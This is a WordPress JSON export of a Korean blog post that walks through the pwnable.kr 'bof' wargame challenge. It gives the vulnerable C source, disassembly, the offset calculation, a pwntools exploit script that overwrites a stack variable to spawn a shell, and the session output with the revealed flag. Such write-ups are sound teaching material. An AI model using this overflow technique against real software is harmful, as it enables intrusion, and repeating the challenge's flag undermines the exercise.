{"id":357,"date":"2023-06-19T16:35:11","date_gmt":"2023-06-19T07:35:11","guid":{"rendered":"https:\/\/h4ck.kr\/?p=357"},"modified":"2024-05-22T17:07:18","modified_gmt":"2024-05-22T08:07:18","slug":"bof","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=357","title":{"rendered":"bof"},"content":{"rendered":"\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;string.h>\n#include &lt;stdlib.h>\nvoid func(int key){\n\tchar overflowme[32];\n\tprintf(\"overflow me : \");\n\tgets(overflowme);\t\/\/ smash me!\n\tif(key == 0xcafebabe){\n\t\tsystem(\"\/bin\/sh\");\n\t}\n\telse{\n\t\tprintf(\"Nah..\\n\");\n\t}\n}\nint main(int argc, char* argv[]){\n\tfunc(0xdeadbeef);\n\treturn 0;\n}\n\n<\/pre>\n<\/div><\/div>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<h2 class=\"wp-block-heading\">\ud480\uc774<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">gets \ud568\uc218 = \uc0ac\uc6a9\uc790\ub85c\ubd80\ud130 \uc785\ub825\ubc1b\uc744 \ub54c \ud06c\uae30\uac00 \uc9c0\uc815\ub418\uc788\uc9c0 \uc54a\uc544 \ubc84\ud37c\ud50c\ub85c\uc6b0 \ubc1c\uc0dd\ud558\uae30 \ucde8\uc57d\ud55c \ud568\uc218<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">undefined  main ()\n   PUSH       EBP\n   MOV        EBP ,ESP\n   AND        ESP ,0xfffffff0\n   SUB        ESP ,0x10\n   MOV        dword ptr [ESP ]=>local_20 ,0xdeadbeef\n   CALL       func\n...<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">undefined  func (undefined4  param_1 )   \n   PUSH       EBP\n   MOV        EBP ,ESP\n   SUB        ESP ,0x48\n   MOV        EAX ,GS:[0x14 ]\n   MOV        dword ptr [EBP  + local_10 ],EAX\n   XOR        EAX ,EAX\n   MOV        dword ptr [ESP ]=>local_4c ,s_overflow_me_:_0001  = \"overflow me : \"\n   CALL       &lt;EXTERNAL>::puts                                 int puts(char * __s)\n   LEA        EAX =>local_30 ,[EBP  + -0x2c ]\n   MOV        dword ptr [ESP ]=>local_4c ,EAX\n   CALL       &lt;EXTERNAL>::gets                                 char * gets(char * __s)\n...<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">func \ud568\uc218\ub97c call\ud574\uc11c \uc9c4\uc785\ud558\uba74 ebp\ub294 main()\uc758 base pointer\ub97c \uac00\uc9c0\uac8c \ub41c\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">overflowme[32] \ubcc0\uc218\ub294 ebp\ub85c\ubd80\ud130 -0x2c(=-44)\ub9cc\ud07c \ub5a8\uc5b4\uc838\uc788\uace0,<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">key\ub294 main() base pointer, func() ret address \uc704\uc778 +8\ub9cc\ud07c \ub5a8\uc5b4\uc838\uc788\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">gets \ud568\uc218\ub97c \ud1b5\ud574 overflow\uc5d0 \ubb38\uc790\ub97c \uc785\ub825\ud560 \ub54c, key\ub97c \ub36e\uc5b4\uc368\uc57c\ud558\ubbc0\ub85c <br>overflow\uc5d0\uc11c key\uae4c\uc9c0 \uac70\ub9ac\ub97c \uad6c\ud558\uba74 52\ub9cc\ud07c\uc758 \uac70\ub9ac\uac00 \ub098\uc628\ub2e4.<\/p>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2023\/06\/\uadf8\ub9bc\u3131-1024x537.png\" alt=\"\" class=\"wp-image-358\" width=\"512\" height=\"269\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2023\/06\/\uadf8\ub9bc\u3131-1024x537.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2023\/06\/\uadf8\ub9bc\u3131-300x157.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2023\/06\/\uadf8\ub9bc\u3131-768x402.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2023\/06\/\uadf8\ub9bc\u3131-1536x805.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2023\/06\/\uadf8\ub9bc\u3131-2048x1073.png 2048w\" sizes=\"auto, (max-width: 512px) 100vw, 512px\" \/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\n\ncontext.log_level = 'debug'\n\np = remote(\"pwnable.kr\", 9000)\n\npayload = \"A\" * 52 + '\\xbe\\xba\\xfe\\xca'\n\np.sendline(payload)\np.interactive();<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@WSL2:~\/CTF\/pwnable.kr$ python3 .\/bof.py\n[+] Opening connection to pwnable.kr on port 9000: Done\n[DEBUG] Sent 0x39 bytes:\n    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  \u2502AAAA\u2502AAAA\u2502AAAA\u2502AAAA\u2502\n    *\n    00000030  41 41 41 41  be ba fe ca  0a                        \u2502AAAA\u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u2502\n    00000039\n[*] Switching to interactive mode\n$ ls\n[DEBUG] Sent 0x3 bytes:\n    b'ls\\n'\n[DEBUG] Received 0x1c bytes:\n    b'bof\\n'\n    b'bof.c\\n'\n    b'flag\\n'\n    b'log\\n'\n    b'super.pl\\n'\nbof\nbof.c\nflag\nlog\nsuper.pl\n$ cat flag\n[DEBUG] Sent 0x9 bytes:\n    b'cat flag\\n'\n[DEBUG] Received 0x20 bytes:\n    b'daddy, I just pwned a buFFer :)\\n'\ndaddy, I just pwned a buFFer :)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n<\/div><\/div>\n","protected":false},"excerpt":{"rendered":"<p>\ud480\uc774 gets \ud568\uc218 = \uc0ac\uc6a9\uc790\ub85c\ubd80\ud130 \uc785\ub825\ubc1b\uc744 \ub54c \ud06c\uae30\uac00 \uc9c0\uc815\ub418\uc788\uc9c0 \uc54a\uc544 \ubc84\ud37c\ud50c\ub85c\uc6b0 \ubc1c\uc0dd\ud558\uae30 \ucde8\uc57d\ud55c \ud568\uc218 func \ud568\uc218\ub97c call\ud574\uc11c \uc9c4\uc785\ud558\uba74 ebp\ub294 main()\uc758 base pointer\ub97c \uac00\uc9c0\uac8c \ub41c\ub2e4. overflowme[32] \ubcc0\uc218\ub294 ebp\ub85c\ubd80\ud130 -0x2c(=-44)\ub9cc\ud07c \ub5a8\uc5b4\uc838\uc788\uace0, key\ub294 main() base pointer, func() ret address \uc704\uc778 +8\ub9cc\ud07c \ub5a8\uc5b4\uc838\uc788\ub2e4. gets \ud568\uc218\ub97c \ud1b5\ud574 overflow\uc5d0 \ubb38\uc790\ub97c \uc785\ub825\ud560 \ub54c, key\ub97c \ub36e\uc5b4\uc368\uc57c\ud558\ubbc0\ub85c overflow\uc5d0\uc11c key\uae4c\uc9c0 \uac70\ub9ac\ub97c \uad6c\ud558\uba74 52\ub9cc\ud07c\uc758 \uac70\ub9ac\uac00 \ub098\uc628\ub2e4.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[4],"tags":[25],"class_list":["post-357","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/357","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=357"}],"version-history":[{"count":2,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/357\/revisions"}],"predecessor-version":[{"id":360,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/357\/revisions\/360"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=357"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=357"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=357"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}